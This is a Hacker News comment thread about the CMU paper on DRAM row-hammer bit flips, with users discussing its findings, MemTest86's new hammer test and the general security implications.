
Flipping Bits in Memory Without Accessing Them [pdf] - lelf
http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
======
userbinator
The tl;dr of this is: DDR3 DRAM modules are not as reliable as once thought,
and all the ones from 2012 and 2013 that they tested showed errors when
exercised with the right access patterns.

What isn't mentioned is whether these would be the types of errors that the
usual memory testers like MemTest86 could detect --- but based on the lack of
any significant news stories in the past 2 years, I'd guess not. Perhaps this
could explain why a lot of people who encountered weird hardware-ish problems
could run MemTest with no errors but still crash with the right workload.

Their dismissal of one of the "potential solutions" is a bit of a WTF:

 _Manufacturers could fix the problem at the chip-level by improving circuit
design. However, the problem could resurface when the process technology is
upgraded. In addition, this may get worse in the future as cells become
smaller and more vulnerable._

As their tests show, modules from 2008 and '09 are basically perfect, and most
of the ones from '10 too. Why could this change in process even be called an
"upgrade" if it results in memory that doesn't behave anymore like memory
should? To me, it's clearly a serious flaw. Their "workaround" proposal of
adding more complexity to the memory controller, and which doesn't actually
guarantee a solution, just feels... _wrong_.

I think this is all really quite scary - programmers are used to, and all
software depends on, memory as something whose contents should not ever change
without being written to! While the majority of access patterns won't trigger
this flaw, the one that does could have significant cascading effects. This
paper really should get more exposure to the public.

~~~
nkurz
Nice review. This is a good paper, and I found it worth reading just for the
clear explanation of how DDR3 memory actually works. Maybe one of these times
I'll finally learn it well enough to remember which is a rank and which is a
bank.

 _Why could this change in process even be called an "upgrade" if it results
in memory that doesn't behave anymore like memory should?_

I wasn't sure from the paper, but I think they were testing memory of
different scale (nm). At least, the majority of the chips with no errors were
1 GB, and the majority of the chips with errors were 2 GB. It's an improvement
because the smaller scale allows higher densities and more storage per chip.

More explanation about the "row hammer" issue is here:

[http://forums.xilinx.com/t5/Xcell-Daily-Blog/Unexplained-
mem...](http://forums.xilinx.com/t5/Xcell-Daily-Blog/Unexplained-memory-
errors-in-your-DDR3-design-Maybe-it-s-Row/ba-p/497600)

 _the usual memory testers like MemTest86 could detect_

Historically no, but the MemTest86 6.0 from a couple months ago added the
"Hammer Test" a couple months ago, citing this paper.

 _I think this is all really quite scary - programmers are used to, and all
software depends on, memory as something whose contents should not ever change
without being written to!_

I agree. From the paper, the strong implication is that a user running
unprivileged code on any modern computer can corrupt memory outside of their
process. Perhaps even with asm.js? Comments in the release announcement thread
suggest, thouth, that although the problem is real, the paper is a bit
alarmist about the prevalence:
[http://www.passmark.com/forum/showthread.php?4836-MemTest86-...](http://www.passmark.com/forum/showthread.php?4836-MemTest86-v6-0-Beta)

~~~
userbinator
_It 's an improvement because the smaller scale allows higher densities and
more storage per chip._

Yes, that's the usual explanation but I don't think it makes much sense here
since the ostensibly "better" memory can produce visible errors that the older
generation didn't. I see the word "tradeoff" being used often in situations
like this but I don't agree that this is, since at some point on the
reliability scale it just stops being memory completely and devolves into some
weird approximation of it.

 _From the paper, the strong implication is that a user running unprivileged
code on any modern computer can corrupt memory outside of their process_

Indeed, that's the big message I get: a tiny and innocuous-looking piece of
code can easily corrupt memory. I'm not someone who believes in conspiracy
theories much, but this looks like an amazingly good backdoor or constituent
of one to me. If memory controllers implement workarounds such as the one
described in the paper to reduce these types of errors, they also naturally
will have options to turn them off for testing/debugging purposes, etc. For
the great majority of the time if they are turned off nothing unusual will be
noticeable, but then the system becomes vulnerable to the specific access
patterns that trigger the fault. Since the documentation on the latest memory
controllers is largely kept secret, a firmware update that silently changes
this setting wouldn't raise much concern - memory initialisation code usually
uses lots of undocumented registers and values anyway. Then all it takes is a
tiny piece of user-level code (possibly obfuscated/concealed in some other
mundane application), maybe with some cooperation/knowledge of how the OS's VM
mapping works, to enable relatively precise corruption of certain addresses in
memory. Although largely (publicly) undocumented, it wouldn't be so difficult
to reverse-engineer the row<>address mappings either. The results could range
from DoS to bypassing access controls, depending on what gets targeted.

The subtle nature of this approach is what makes it all the more scarier; the
access patterns that trigger it aren't so unusual, and it's just reading from
memory. I doubt it can be easily triggered (never say never...) from compiled
languages like JS but virtualised environments appear vulnerable (unless the
hypervisor constantly moves the pages around, incurring a significant
performance penalty).

 _although the problem is real, the paper is a bit alarmist about the
prevalence_

The paper assumes exactly knowledge of the row<>address mappings and hammered
the DRAM with that, whereas MemTest's implementation might not know the exact
mapping used by a particular controller+configuration. Their estimate is 5-20%
(a huge range), under "less optimal" hammering, which is still cause for
concern.

